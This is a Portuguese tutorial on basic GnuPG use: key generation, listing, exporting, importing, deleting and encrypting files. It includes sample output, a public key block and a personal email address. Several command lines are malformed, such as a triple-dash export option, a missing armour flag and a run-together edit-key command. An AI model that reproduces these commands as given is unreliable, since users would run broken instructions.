Nesse passo o GnuPG cria um identificador a partir dos seus dados pessoais. Você precisará informar seu Nome Completo, Endereço de correio eletrônico e opcionalmente um comentário. Não se preocupe em errar algum dado, pois uma mensagem para confirmação será exibida.

Após ter terminado essa etapa você devera informar um frase secreta:


Digite a frase secreta
Repita a frase secreta:  
Depois de ter escrito a frase secreta e repitido ela , sua chave será criada:




Precisamos gerar muitos bytes aleatórios
É uma boa idéia realizar outra 
atividade 
(digitar no tecladomover o mouseusar os discosdurante a 
geração dos números primos
isso dá ao gerador de números aleatórios 
uma chance melhor de conseguir entropia suficiente

..............+++++ 
......+++++ 
Precisamos gerar muitos bytes aleatóriosÉ uma boa idéia realizar outra 
atividade 
(digitar no tecladomover o mouseusar os discosdurante a 
geração dos números primos
isso dá ao gerador de números aleatórios 
uma chance melhor de conseguir entropia suficiente

.+++++ 
.+++++ 
gpgchave C8F75708 marcada como plenamente confiável 
chaves pública e privada criadas e assinadas
gpgchecando o trustdb 
gpg
3 parcial(isnecessária(s), 1 completa(snecessária(s), modelo de confiança PGP 
gpg
profundidade0 válidas:   1 assinadas:   0 confiança0-, 0q0n0m0f1u 
pub   2048R
/C8F75708 2012-06-17 
      Impressão digital da chave
2412 BFC6 E9BB 2BD4 06DD  29ED F1BC 312C C8F7 5708 
uid                  MMxM
~ <mmedeiros1983@hotmail.comsub   2048R/5DD33612 2012-06-17  


Listando Chaves


Para listar as chaves armazenadas, use o comando:





gpg --list-keys /home/mmxm/.gnupg/pubring.gpg ----------------------------- pub   2048R/C8F75708 2012-06-17 
uid                  MMxM
~ <mmedeiros1983@hotmail.comsub   2048R/5DD33612 2012-06-17
  
A primeira coluna exibe o tipo de chave: a palavra pub indica uma chave publica principal para assinaturas, enquanto a palavra sub indica uma chave publica subordinada. A segunda coluna indica a quantidade de bits da chave, seguido por seu tipo e seu número de identificação em hexadecimal. A terceira coluna é exibido a data de criação da chave (yyyy,mm,dd). Por fim, a última coluna exibe o identificador do usuário.

Nesse exemplo, o key-ID é C8F75708 e o user-ID tanto pode ser o nome: MMxM~ como o e-mail:hchost@hotmail.com


No caso das chaves privadas basta digitar




gpg --list-secret-keys /home/mmxm/.gnupg/secring.gpg ----------------------------- sec   2048R/C8F75708 2012-06-17 
uid                  MMxM
~ <mmedeiros1983@hotmail.comssb   2048R/5DD33612 2012-06-17  



Exportando e importando chaves

Exportando chaves pública


Sua chave pública deve ser distribuída a outros usuários para que possam enviar dados criptografados ou checar a autenticidade de seus arquivos. Para exportar sua chave pública em um arquivo que será distribuído a outras pessoas ou servidores de chaves na Internet, use a opção --export:




 
gpg --export -[key-ID] > chave-pub.asc  
Ao invés do key-ID, pode ser usado o user-ID. A opção -a permite que os dados sejam gerados usando bits ASCII 7.

Chave pública:


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.11 (GNU/Linux)

mQENBE/eJy8BCAC6cfHGs+tZuYDovPcH4ThEdf8A8RbmkC/DSUM15/w80fjsFIZ0
/ws1MrEMtgaW3Or34MGUR3XfzNxDfFaorkk1h6Bn6qkPLHi7gspAUGGXUd87MbDu
iW1g/+/hijRrJkiVEwi6fV3tt+G7q1CG8lryVDSU6Wein6uJ+Eq0SuwP++/w8aJ6
ajlMCDKBvf779uXPYpvTaeB8pQuf0rB0IkaOngJ63xuSOsjQE796Dr0WYJPagWrU
GK8K4yu6wJsNhTZSfed3cWtKHbQvRPMHLRPqbOqAX5SjBoB5pb1Jqg/3lM1741it
N6/L0v91szWr4elVg0I5izJJpz2JdHOdTnhzABEBAAG0IU1NeE1+IDxtbWVkZWly
b3MxOTgzQGhvdG1haWwuY29tPokBOAQTAQIAIgUCT94nLwIbAwYLCQgHAwIGFQgC
CQoLBBYCAwECHgECF4AACgkQ8bwxLMj3Vwg4SAf+O3vJqnc5lwxDwTWqKOrt0xnA
R2lDUxlcaaPYTLjDijeeZyQbqdgokKJNTmaIVut+FNH0FKO4jfSa+oyf0tUY9Oad
m4AdT3zfnDGqfZSYO5UHQ3rc5buGn3ZtoYuEWJ90JovifQxbmXasEvGUZ05OUrDP
t4aA5Eq5vVIgK/nIQS6qHP43z7Q2Y+SHqVe43CPSjv4L4byR3k4GJ3wUjiU2t716
2pCPsMD3PXOQzp+C25a453agCwd1n/xytucsLAyjMzIbo55J2aTEOCzK/YGXbYri
gP6FuTusEY5GAGNK0jlI1Yc4FbAnt8Fc2EQ2FGuWkNQZoqoOT0UKlqqK4bAlb7kB
DQRP3icvAQgAtQKKu28jy1+jW3KuX5vYfuSfK86Qyhp6+RyyDRq5UQ2NP5bUddCH
1ZGNHD1ayWSx23wdojerZtmZxA6B3EAy/x+BjUSMtCMe7ZmxowrATEzR0XcAdSUB
+U/BvxOLLUShCt2rtDplz9Yjp8JUn0gkEbnwEnTLAiUJ3DKOBaYpiwDzUsgKELkQ
u4DOevKx9iVIU1SLp5AJtMajMlrtxMRvi8Z30Qgitml2qf2DZClHxYKtLyWAM0Mv
b1MPiTqovz2IQxFhVXwHPDoM32DbmxHrmL2z18kWRx8VQZbboja1gqL70aJgVt1l
/3oKoIaS3dNYx0tOCDnDGl4mR+rrhq0aiQARAQABiQEfBBgBAgAJBQJP3icvAhsM
AAoJEPG8MSzI91cI6WsIALXaVd7uooU/MtQU3hk9K73Bqj/ARpIKJzkfcwXYk7Ia
b75H/oCu+RKz7tTemLkdS2vPdNNCuf8plxks7DtZeu9VAOeKEZDnrSBRm8ftrlUr
p3QLDKy4c+E1GcifxHhWksy/jmHcggIGWewVHNacLjtchhsLICjRFAecBqTxVN/A
WYJDK1Xn0NsbDKkiNlDxlby3b/lij4fUwMSY7XHlCzjM6NvwejapQ9hLNiaSM2Fu
nqtvlc/GcrJRMizPz7fbVUeBX93X64IvFEk/I+j4JO4ugesVttGZIHWaFpejIn3b
2aDzmH1hZWl9z6AqHQpktTjvMg1+npJn57IfOrehkzw=
=xrSJ
-----END PGP PUBLIC KEY BLOCK-----
Exportando chave privada

Você só deve exportar uma chave privada se for fazer backup dela , ela não pode ser publicada !!!
Comando:

:
gpg ---export-secret-keys <nr_da_chave> > arq.key  
A extensão .asc é de uma chave pública , e a extensão .key é de uma chave privada


Importanto chaves

Uma chave pública pode ser adicionada ao seu chaveiro público com a opção --import.


gpg --import arquivo  

Remoção de chaves do chaveiro

Para remover uma chave pública do chaveiro:


gpg --delete-keys <nr da chave>  
Para remover uma chave privada do chaveiro:


gpg --delete-secret-keys <nr da chave>  

Alteração da passphrase de uma chave

Para alterar a senha digite:




gpg --edit-key <nr da chavepassword  

Para sair do ambiente de edição e salvar as alterações, digite “quit”.


Codificando e decodificando arquivos

O procedimento para codificar e decodificar arquivos é simples e direto. Se você quer codificar uma mensagem para um amigo, você usa a chave pública dele e só ele irá decodificar a mensagem usando a chave privada. Se um amigo quer enviar uma mensagem para você, ele codifica usando sua chave pública e você decodifica usando sua chave privada.

Para codificar (--encrypt) um arquivo, use o comando:




gpg --output arquivo_secreto  --recipient [key-ID-destinatario] --encrypt arquivo_original  


Para decodificar (--decrypt) um arquivo, use o comando:


gpg --output arquivo_decodificado --decrypt arquivo_secreto  


Outras possibilidades

Para ver outras possibilidades de uso do comando gpg, utilize os comandos:



gpg --help man gpg  

As opções sitadas acima são opções de utilização básica do gpg